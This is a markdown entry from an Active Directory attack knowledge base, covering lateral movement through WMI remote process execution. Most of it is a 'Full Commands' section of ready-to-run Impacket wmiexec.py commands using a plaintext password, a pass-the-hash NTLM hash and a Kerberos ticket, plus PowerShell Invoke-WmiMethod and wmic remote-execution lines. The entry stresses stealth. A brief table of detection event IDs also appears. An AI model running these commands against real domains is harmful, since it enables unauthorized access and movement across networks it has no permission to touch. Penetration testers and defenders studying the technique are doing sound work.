attack-58-wmi-lateral-movement.md (2943B)
1 --- 2 title: "Attack #58 — WMI Lateral Movement" 3 description: "WMI (Windows Management Instrumentation) enables remote process execution via the Win32_Process.Create() method. WMI-based execution is the stealthiest…" 4 category: active-directory 5 subcategory: "Lateral Movement" 6 tags: ["active-directory", "kerberos", "lateral-movement", "hashing"] 7 tools: ["Impacket", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Seven/⚫ Attack #58 — WMI Lateral Movement.md" 11 --- 12 # ⚫ Attack #58 — WMI Lateral Movement 13 14 *** 15 16 ## 📖 How It Works 17 18 WMI (Windows Management Instrumentation) enables remote process execution via the `Win32_Process.Create()` method. WMI-based execution is **the stealthiest Impacket execution method** — it doesn't create services, doesn't write files to disk, and runs commands in the context of the authenticated user (not SYSTEM). 19 20 *** 21 22 ## ⚙️ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **Local admin on target** | Required for WMI access | 27 | **WMI / DCOM ports** | TCP 135 + dynamic RPC | 28 29 *** 30 31 ## 💻 Full Commands 32 33 ```bash 34 # ── Impacket wmiexec.py (best stealth) ──────────────────────────────────────── 35 wmiexec.py corp.local/Administrator:'Password1'@10.10.10.10 36 37 # ── PtH ─────────────────────────────────────────────────────────────────────── 38 wmiexec.py corp.local/Administrator@10.10.10.10 -hashes :2b576acbe6bcfda7294d6bd18041b8fe 39 40 # ── Kerberos ────────────────────────────────────────────────────────────────── 41 export KRB5CCNAME=admin.ccache 42 wmiexec.py -k -no-pass corp.local/Administrator@DC01.corp.local 43 44 # ── Single command ──────────────────────────────────────────────────────────── 45 wmiexec.py corp.local/Administrator:'Password1'@10.10.10.10 "ipconfig /all" 46 ``` 47 48 ```powershell 49 # ── Native PowerShell / wmic ────────────────────────────────────────────────── 50 Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\Temp\out.txt" -ComputerName TARGET 51 wmic /node:TARGET process call create "cmd.exe /c whoami > C:\Temp\out.txt" 52 ``` 53 54 *** 55 56 ## 🛡️ Detection — Event IDs 57 58 | Event ID | Source | What to Look For | 59 |---|---|---| 60 | **4624** | Security Log | Logon Type 3 via WMI | 61 | **4688** | Security Log | cmd.exe spawned by WmiPrvSE.exe | 62 63 *** 64 65 > ✅ **Attack #58 — WMI Lateral Movement complete.**